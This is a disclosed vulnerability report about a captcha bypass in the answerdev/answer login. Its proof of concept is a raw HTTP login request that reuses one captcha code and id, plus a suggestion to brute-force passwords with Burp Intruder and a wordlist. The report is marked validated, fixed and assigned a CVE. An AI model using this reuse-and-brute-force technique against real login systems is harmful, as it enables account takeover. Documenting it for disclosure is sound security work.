Captcha Bypass on login in answerdev/answer

Valid

Reported on

Feb 21st 2023

Description

So if we login incorrectly multiple times, we get captcha. Each captcha has "captcha_id" and solve "captcha_code" For example: "captcha_code":"8awt" "captcha_id":"7nToXDrT6SkJ2BJxKG1u" You can use same captcha code and captcha id in login without any problem

Captcha is generated with - http://34.245.133.152:9080/answer/api/v1/user/action/record?action=login

Proof of Concept

Login multiple times and get any captcha Captcha URL: http://34.245.133.152:9080/answer/api/v1/user/action/record?action=login

Type captcha code and login

Your request:

POST /answer/api/v1/user/login/email HTTP/1.1
Host: 34.245.133.152:9080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en_US
Accept-Encoding: gzip, deflate
Authorization: 
Content-Type: application/json
Content-Length: 105
Origin: http://34.245.133.152:9080
Connection: close
Referer: http://34.245.133.152:9080/users/login

{"e_mail":"sdad@gmail.com","pass":"sdadssadda","captcha_code":"8awt","captcha_id":"7nToXDrT6SkJ2BJxKG1u"}
----------------------------------------------------------------

Use this request as long as you want, with same captcha_code and same captcha_id

Response you will get each time:
----------------------------------------------------------------
HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=utf-8
Date: Tue, 21 Feb 2023 12:44:12 GMT
Content-Length: 186
Connection: close

{"code":400,"reason":"error.object.email_or_password_incorrect","msg":"Email and password do not match.","data":[{"error_field":"e_mail","error_msg":"Email and password do not match."}]}

You can use burpsuite and send it to intruder and add wordlist then check with 1000 requests. Result will be same.

Impact

The security measure is to require the user to solve a captcha after multiple failed login attempts. The captcha includes a "captcha_code," which is the code the user must enter to prove they are human, and a "captcha_id," which is a unique identifier for that particular captcha. Once a attacker solves 1 captcha, they can use the same "captcha_code" and "captcha_id" for subsequent login attempts without any issue.

We are processing your report and will contact the answerdev/answer team within 24 hours. 3 months ago

We have contacted a member of the answerdev/answer team and are waiting to hear back 3 months ago

hatlesswizard modified the report

3 months ago

hatlesswizard modified the report

3 months ago

joyqi validated this vulnerability 2 months ago

hatlesswizard has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

joyqi marked this as fixed in 1.0.6 with commit 813ad0 2 months ago

The fix bounty has been dropped

This vulnerability has been assigned a CVE

joyqi published this vulnerability 2 months ago

to join this conversation

We are processing your report and will contact the answerdev/answer team within 24 hours. 3 months ago

We have contacted a member of the answerdev/answer team and are waiting to hear back 3 months ago

hatlesswizard modified the report

3 months ago

hatlesswizard modified the report

3 months ago

joyqi validated this vulnerability 2 months ago

hatlesswizard has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

joyqi marked this as fixed in 1.0.6 with commit 813ad0 2 months ago

The fix bounty has been dropped

This vulnerability has been assigned a CVE

joyqi published this vulnerability 2 months ago

to join this conversation